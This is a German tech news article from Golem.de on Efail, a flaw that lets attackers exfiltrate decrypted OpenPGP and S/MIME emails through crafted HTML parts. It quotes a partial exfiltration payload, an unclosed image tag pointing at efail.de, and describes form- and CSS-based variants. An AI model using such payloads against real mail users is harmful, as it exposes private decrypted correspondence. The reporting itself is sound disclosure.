PGP/SMIME: Angreifer können sich entschlüsselte E-Mails schicken lassen

Ein Zusammenspiel von veralteten Verschlüsselungsmethoden und HTML-Mails erlaubt es in vielen Fällen, mit OpenPGP oder S/MIME verschlüsselte Nachrichten zu exfiltrieren. Bislang gibt es keine echten Fixes und nur unzureichende Workarounds.

Artikel von Hanno Böck veröffentlicht am
Ouch ... die Mailverschlüsselungsstandards S/MIME und OpenPGP nutzen uralte Verschlüsselungsverfahren - und das rächt sich jetzt bitter.
Ouch ... die Mailverschlüsselungsstandards S/MIME und OpenPGP nutzen uralte Verschlüsselungsverfahren - und das rächt sich jetzt bitter. (Bild: Jana Runde/Zuzana Somorovska)

Ein Forscherteam hat eine ganze Reihe von Problemen bei der Verwendung verschlüsselter E-Mails entdeckt. Die Efail getaufte Lücke betrifft beide standardisierten E-Mail-Verschlüsselungsverfahren - OpenPGP und S/MIME - und lässt sich in zahlreichen E-Mail-Clients ausnutzen.

Inhalt:
  1. PGP/SMIME: Angreifer können sich entschlüsselte E-Mails schicken lassen
  2. Verschlüsselung nicht authentifiziert
  3. Workarounds, Updates, Gegenmaßnahmen

Das Grundproblem: Verschlüsselung ohne Authentifizierung. S/MIME nutzt einen völlig unauthentifizierten Verschlüsselungsmodus, in OpenPGP ist zwar theoretisch eine Authentifizierung vorgesehen, die ist aber in der Praxis oft nutzlos.

Die Angriffe nutzen HTML-Mails, um entschlüsselte Daten an den Server des Angreifers zu schicken. Dabei wird eine bestehende E-Mail so umgestaltet, dass der HTML-Code eine Anfrage zu einem Server auslöst und dabei den entschlüsselten Text der Mail mitschickt.

Angriff über Multipart-Mails

Bereits daraus lässt sich in manchen Fällen ein Angriff konstruieren. E-Mail-Nachrichten können aus mehreren Teilen bestehen, sogenannte Multipart-Messages. In manchen Mailclients - am einfachsten in Apple Mail - ist es möglich, direkt aus dem HTML-Teil einer Nachricht auf den nachfolgenden Textteil zuzugreifen.

Stellenmarkt
  1. IT-Engineer (m/w/d) Citrix & Microsoft
    ZIEHL-ABEGG SE, Künzelsau
  2. Data Engineer (w/m/d)
    Bundesanstalt für Finanzdienstleistungsaufsicht (BaFin), Frankfurt am Main, Bonn
Detailsuche

Ein Angreifer kann nun Folgendes machen: Er schickt als ersten Teil einer Nachricht einen HTML-Teil, der beispielsweise ein Bild lädt, aber den HTML-Tag nicht schließt. Also etwa <img src="http://efail.de/. Als zweiten Teil hängt er den verschlüsselten Teil einer Mail an, die er mitgelesen hat, etwa über einen Man-in-the-Middle-Angriff zwischen den Mailservern. Im Mailclient des Opfers passiert nun Folgendes: Ein Bild wird vom Server des Angreifers geladen und als Pfad wird der Inhalt des nachfolgenden Textteils codiert angehängt.

In Apple Mail funktioniert dieser Angriff direkt, in Mozilla Thunderbird werden in der Standardeinstellung keine Bilder geladen. Doch auch hier ist es mit Tricks möglich, eine Exfiltration der Daten zu erreichen. So kann man beispielsweise per HTML ein Formular erzeugen, das die Daten des verschlüsselten Teils an den Angreifer schickt. Da man die Mail über CSS beliebig layouten kann, kann man das auch so machen, dass ein Klick irgendwo in der Mail dazu führt, dass das Formular abgeschickt wird.

Bitte aktivieren Sie Javascript.
Oder nutzen Sie das Golem-pur-Angebot
und lesen Golem.de
  • ohne Werbung
  • mit ausgeschaltetem Javascript
  • mit RSS-Volltext-Feed
Verschlüsselung nicht authentifiziert 
  1. 1
  2. 2
  3. 3
  4.  
Reklame: Hier geht es zu Hacking & Security: Das umfassende Handbuch bei Amazon
Zu den Kommentaren springen
Verwandte Artikel
artikel-bild
PGP/SMIME
Thunderbird-Update notwendig, um E-Fail zu verhindern
artikel-bild
eFail
Was tun ohne E-Mail-Sicherheit?
artikel-bild
E-Mail-Verschlüsselung
PGP und S/MIME abschalten
artikel-bild
Schleuder
Wie verschlüsselt man eine Mailingliste?
artikel-bild
Sliding right into disaster
Lücke macht kurze RSA-Schlüssel angreifbar
Meistgelesen
artikel-bild
Displayreinigung
Apple bringt 25-Euro-Poliertuch mit Kompatibilitätsliste
artikel-bild
Apple
Macbook Pro bekommt Notch und Magsafe
artikel-bild
Irische Datenschutzbehörde
Max Schrems soll Dokument von seiner Webseite nehmen
artikel-bild
Nach Datenleck
Hausdurchsuchung statt Dankeschön
artikel-bild
In-Ears
Apple stellt Airpods 3 vor
Kommentarübersicht
Re: E-Mail ist schon lange kaputt
mark.wolf 22. Mai 2018

Du solltest Dich mal ein klein wenig mit dem Recht auseinandersetzen. Auch dein...

Re: Fragen zum Ablauf und Informationsgewinn für...
Auspuffanlage 21. Mai 2018

Hi ich interpretiere das mal so, dass du wissen willst wo es diese Informationen gibt...

Re: eine etwas andere zusammenfassung
joo 17. Mai 2018

-------------------------------------------------------------------------------- +1...

Re: clients fixen
phade 15. Mai 2018

Zumeist Mail von der Seamonkey-Suite (ergo Thunderbird). Nur nutzt das nix, wenn das für...

Re: Angaben zu MDC im Artikel ungenau/irreführend
Mr Miyagi 15. Mai 2018

Natürlich *kann* es das. GnuPG könnte auch ein Abbild Deiner ganzen Mailbox im Speicehr...

Aktuell auf der Startseite von Golem.de
Apple
Macbook Pro bekommt Notch und Magsafe

Apple hat das Macbook Pro in neuem Gehäuse, mit neuem SoC, einem eigenen Magsafe-Ladeport und Mini-LED-Display mit Kerbe vorgestellt.

Apple: Macbook Pro bekommt Notch und Magsafe
Artikel
  1. Displayreinigung: Apple bringt 25-Euro-Poliertuch mit Kompatibilitätsliste
    Displayreinigung
    Apple bringt 25-Euro-Poliertuch mit Kompatibilitätsliste

    Fast unbemerkt hat Apple den eigentlichen Star des Events von Mitte Oktober 2021 in seinen Onlineshop aufgenommen: ein Poliertuch.

  2. In-Ears: Apple stellt Airpods 3 vor
    In-Ears
    Apple stellt Airpods 3 vor

    Apple hat auf seinem Event die Airpods 3 vorgestellt, die den Airpods 3 Pro sehr ähnlich sehen - allerdings ohne Geräuschunterdrückung.

  3. 5 Euro: Apple bietet günstigeres Music-Abo an
    5 Euro
    Apple bietet günstigeres Music-Abo an

    Apple hat ein preiswerteres Apple-Music-Abo angekündigt, das aber nur mit dem Sprachassistenten Siri gesteuert werden kann.

Du willst dich mit Golem.de beruflich verändern oder weiterbilden?
Zum Stellenmarkt
Stellemarkt-Logo
Zur Akademie
Akademie-Logo
Zum Coaching
Shifoo-Logo
  • Schnäppchen, Rabatte und Top-Angebote
    Die besten Deals des Tages
    Daily Deals • Cyber Week: Bis zu 360€ auf Gaming-Monitore & bis zu 22% auf Be Quiet • LG-TVs & Monitore zu Bestpreisen (u. a. Ultragear 34" Curved FHD 144Hz 359€) • Bosch-Werkzeug günstiger • Dell-Monitore günstiger • Horror-Filme reduziert • MwSt-Aktion bei MM: Rabatte auf viele Produkte [Werbung]
  1. Themen
  2. A
  3. B
  4. C
  5. D
  6. E
  7. F
  8. G
  9. H
  10. I
  11. J
  12. K
  13. L
  14. M
  15. N
  16. O
  17. P
  18. Q
  19. R
  20. S
  21. T
  22. U
  23. V
  24. W
  25. X
  26. Y
  27. Z
  28. #
 
 
    •  /